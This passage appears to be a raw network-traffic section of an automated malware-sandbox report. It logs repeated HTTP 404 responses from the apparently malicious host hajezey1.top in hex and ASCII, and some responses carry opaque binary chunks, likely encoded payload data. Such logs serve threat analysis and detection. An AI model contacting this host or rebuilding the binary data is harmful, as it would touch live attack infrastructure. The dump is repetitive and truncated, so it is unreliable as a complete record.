20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 